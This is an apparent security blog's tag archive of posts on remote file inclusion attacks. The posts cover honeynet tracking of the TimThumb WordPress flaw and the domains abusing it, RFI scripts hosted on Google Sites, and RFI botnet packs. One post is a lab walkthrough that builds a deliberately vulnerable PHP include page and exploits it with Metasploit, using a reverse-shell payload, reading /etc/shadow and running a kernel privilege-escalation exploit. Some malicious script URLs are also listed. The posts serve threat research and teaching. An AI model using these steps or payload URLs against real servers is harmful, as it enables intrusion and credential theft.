Tag Archives: RFI

WordPress TimThumb RFI Vulnerability used as Botnet Recruitment Vector

On thirst August 2011, Mark Maunder had reveal, through a defacement experience, that “timthumb.php” script, included in hundreds of WordPress themes, was vulnerable to remote file inclusion (RFI) attack. TimThumb is small php script for cropping, zooming and resizing web images (jpg, png, gif).

The default configuration of “timthumb.php” script, in many WordPress themes, allow remote file inclusion from the following domains:

  • flickr.com
  • picasa.com
  • blogger.com
  • wordpress.com
  • img.youtube.com
  • upload.wikimedia.org
  • photobucket.com

Unfortunately the domain code verification was buggy, allowing remote file inclusion if the above domain strings appears anywhere in the hostname, for example : picasa.com.zataz.com.

To create such DNS entries you need to have control on a zone hosted by a DNS server, the attack vector is more complex than a simple RFI attack how don’t need this kind of resource.

Since few weeks, I observe through my Honeynet that attempts to exploit this vulnerability are increasing and that it is now fully integrated as dork into the ByroeNet like tools. The fact is that more and more exploitable DNS entries are created how allow the TimThumb vulnerability exploitation.

For example, one of the most active TimThumb vulnerability domain is actually “picasa.com.xpl.be“, how has the following details :

  • RFI IP :
  • RFI FQDN :
  • RFI Country : United States

Domain name servers authority for “picasa.com.xpl.be” and “xpl.be” domain names are :

xpl.be.			81644	IN	NS	ns2.afraid.org.
xpl.be.			81644	IN	NS	ns3.afraid.org.
xpl.be.			81644	IN	NS	ns1.afraid.org.
xpl.be.			81644	IN	NS	ns4.afraid.org.

ns1.afraid.org.		508	IN	A
ns2.afraid.org.		206	IN	A
ns3.afraid.org.		26	IN	A
ns4.afraid.org.		26	IN	A

afraid.org is a free DNS hosting, dynamic DNS hosting, static DNS hosting, subdomain and domain hosting services provider.

xpl.be domain name has been registered, the 5 April 2010, through Key-Systems GmbH a german domain name registrar and the registration informations are :

Name : Dolores Aleman
Organisation : Dolores Aleman
Address : 1014 south 2nd st - 78550 Harlingen AL US
Email : [email protected]

Registrant technical contacts
Name : Mr XpL
Organisation : XpL inc
Address : 1014 south 2nd st - 78550 Harlingen AL US
Email : [email protected]

Both “picasa.com.xpl.be” and “xpl.be” are hosted on IP from midPhase.com a hosting service provider, but this hosting service provider doesn’t provide any free hosting services. Also as you can see below the xpl.be web site designer know ASCII art.

Other example is “picasa.compress.cu.cc“, registered on “cu.cc” the 13 September 2011 by “[email protected]“. the domain name and website are hosted on 50Webs.com a free DNS and hosting provider.

picasa.computergoogle.co.cc“, registered on “co.cc” registrar the 22 September 2011 by “[email protected]“. The domain name and website are hosted on 50Webs.com a free DNS and hosting provider.

wordpress.com.daliacarella.com“, registered on “www.000domains.com” the 17 July 2011 by “[email protected]”. The domain name and the website are hosted on HostDime.com.

blogger.com.donshieldphotography.com“, registered on Visual Solutions Group Inc the 19 January 2011 by “Don Shield Photography“. The domain name and the website are hosted on Visual Solutions Group Inc. “www.donshieldphotography.com” seem to be a legitimate Web site, but Visual Solutions Group Inc infrastructure seem also compromised.

blogger.com.aptum.nu“, registered on nunames.nu the 24 October 2006 by “[email protected]”. The domain name and the website are hosted on ODERLAND. “aptum.nu” seem to be a legitimate Web site.

blogger.com.jewelhost.co.uk” registered on 123-reg.co.uk the 04 May 2010 by “Callum Baillie”. The domain name and the website are hosted on JewelHost.co.uk a hosting provider how seem to be compromised.

blogger.com.tara-baker.com” registered on Tucows Domains the 07 January 2010 by “UK2.net”. The domain name and the website are hosted on VC-Hosting.com a hosting provider how seem to be compromised.

picasa.com.marcialia.com.br” has his domain name and website hosted on SERVER4YOU a hosting provider how propose free hosting trial during 6 months.marcialia.com.br seem to be a legitimate web site, the account seem to be compromised.

Other domains how are also participating to the TimThumb Botnet : “picasa.com.crimecyber.tk“, “blogger.com.1h.hu“, “picasa.com.nixonmu.com“, “blogger.com.lionsurveys.com“, “blogger.com.autoelectricahernandez.com“.

You have also “picasa.com.throngbook.com“, “blogger.com.cursos.secundariatecnica33.org”  how are actually down.

All these compromised sites seem to be related to the Indonesian Byroe.net network.

Here under you can find some live stats on the TimThumb vulnerability exploitation attempts detected by our Honeynet.

Remote File Inclusion and privilege escalation through Metasploit

Demonstration of a RFI (Remote File Inclusion) attack followed by a privilege escalation through Metasploit. The privilege escalation will be done through the CVE-2010-3904 Linux RDS Protocol vulnerability.

Vulnerable web page creation

mkdir 1
vi 1/index.php
if(isset($_REQUEST['COLOR'])) {
$color = $_REQUEST['COLOR'];
require ($color . '.php');

chown -R apache:apache 1

Vulnerable web page exploitation through Metasploit

use exploit/unix/webapp/php_include
show options
set PATH /1/
set PHPURI /index.php?COLOR=XXpathXX
show options

set PAYLOAD php/meterpreter_reverse_tcp
show options

cat index.php
cat /etc/shadow

lcd /home/eromang/exploits/linux/local_escal­ations
upload linux-rds-exploit_CVE-2010-3904

execute -i -f bash
chmod u+x linux-rds-exploit_CVE-2010-3904
cat /etc/shadow

Video demonstration

Remote File Inclusion in Google Cloud – nurhayati satu

Every know the Cloud security problematic, and the associated issues how are more and more visible. In July 2008 Outblaze and Spamhaus blocked Amazon EC2 Public IP ranges due to distribution of spam and malware. In April 2009 Arbor Networks reported that a malicious Google AppEngine was used as botnet CnC. In April 2010, VoIP Tech Chat has reported some Amazon EC2 SIP brute force attacks, until abuse report to Amazon EC2 the attacks have still continue in May, etc.

In March 2009, our Honey Net reported us a malicious Remote File Inclusion code hosted on a Google Sites, how was invoked in few events. The Google Sites was called “nurhayati satu“, an Indonesian surname and first name. The invoked malicious script was “http://sites.google.com/site/nurhayatisatu/1.txt???“.


Between March 2009 and May 2010, no more sign of life of this Google Sites. But since May the number of events have increase and we could distinguish the apparition of the “Cloud” phenomena. “nurhayati satu” Google Sites has now around 16 IP addresses associated as hosting server and all these IP addresses are owned by Google Inc. The involved CIDR’s are and

It is interesting to visualize the interactions of the attackers source IPs (in blue) with the Google Sites Cloud destination IPs (in green).

Google Sites Cloud RFI
Google Sites Cloud RFI

You can see that the attackers source IPs are not dedicated to one hosting server IP, but are also invoking the “Cloud” IPs.

Between the search engine of the “nurhayati satu” Google Sites you can find other hosted classical scripts, scanners, tcl, etc.

Every one of you know the Google results labelled ‘This site may harm your computer‘.

It will be funny if Google Sites themselves will be labelled, but more seriously should we declare Google Sites to Dshield, Abuse.ch or Emerging Threats ? Should we block Google, cause Google is delivering some malwares between his Cloud infrastructure, and no one care 🙂

When an old Tier RFI mutate into a RFI botnet

Every one of you know Remote File Inclusion vulnerability, how permit to include a remote file usually through a PHP script on the Web application. This remote file contain some code how will be executed in the context of the server and permit for example to gather informations, execute code and compromise the Web server.

An typical RFI attack is to target Web applications how are vulnerable to an RFI. For example the actual most targeted RFI vulnerability is “MODx CMS snippet.reflect.php reflect_base CVE-2008-5938“.

Same as Metalica, bad guys are seeking and then destroying. But before destroying, bad guys seeking potential targets with search engines (Google, Yahoo, Live, Ask, etc.) and if some results are matching, they then try to see if the Web application URL is vulnerable or not. Same as a submarine active sonar, the remotely included code will ping the potential vulnerable URL, and if this URL is vulnerable the Web application will do an code echo reply. PS : Special dedicated to :


Now the bad guys knowing that the Web application URL is vulnerable, they will gather more informations about the Web application and server environment. Following the responses to the informations gathering, the bad guys will decide which kind of infections they could apply and how depth the infections would be. The critical informations that the bad guys will look are for example :

  • Is PHP safe mode set to “on” ?
  • What is the OS hosting the vulnerable application ?
  • Version of the kernel, if applicable ?
  • What is the user running the web application, most of time httpd or apache.
  • What are the permissions of the Web application directories, read only, writable ?

If PHP safe mode is set to “on”, the bad guys will only use the vulnerable Web application and server as repository for some scripts, most of time the “ping code” and the “informations gathering code“.

If PHP safe mode is set to “off”, then the bad guys will begin to remote upload, on the server, more scripts. Mainly RFI viral packs containing these capabilities :

  • IRC Command & Control bot module
  • Search engines targets seeker module
  • RFI code ping scan script
  • RFI code echo reply listener module
  • Informations gathering script
  • IRC channels & words spying module
  • DOS & DDOS module
  • Portscanner module
  • Fake speaking & answering IRC bots module
  • Google bypasser module
  • PHP shells script

What is really important to understand is that every parts of these RFI viral packs could be decentralized on other compromised servers, and controlled by different IRC Command & Control servers . And now, longer the first initial Web application and server is compromised, longer this infected host will participate to increase the size of the RFI botnet.

We will use a example, a very old friend of our HoneyNet, lunched in February 2009. We will call our old friend “RFI n°4” (Nooo, I’m not an number….) and provide you his ID card.

  • RFI ID : 4
  • RFI IP :
  • RFI FQDN : virtual.interfree.it
  • RFI Country : Italy
  • RFI Vhost : brej.interfree.it
  • RFI URL : http://brej.interfree.it/id.jpg??
  • Number of events generated by n°4 : 1935
  • Number of source IPs how are calling the RFI URL : 112
  • RFI first seen : 2009-02-15 20:54:58
  • RFI last seen : 2010-05-26 21:48:09
  • RFI life time : 465 day’s

Hu, 465 days old … my n°4 friend is very old and has a lot of friends how are visiting him (112 source IPs). The number of events is quiet relative, cause 465 day’s for only generating 1935 events, my n°4 friend you could do better, maybe your master is a lazy guy. All you friends are trying different attacks, with your help, against our HoneyNet.

RFI n°4 as red, and all his friends in green with the related SIG attempts
RFI n°4 as red, and all his friends in green with the related SIG attempts

What is interesting n°4, is that some of your friends are also RFI infected, and all together you create a big family linked together (RFI botnet).

RFi n°4 centralized in red, and all his friend
RFi n°4 centralized in red, and all his friend

Another possible visualization is to see month by month the activities turning around our n°4 RFI friend. RFI n°4 is indicated in green colors, source IPs how are not also RFI are indicated in orange colors and source IPs how are also RFI are indicated in red flame colors.
[nggallery id=4]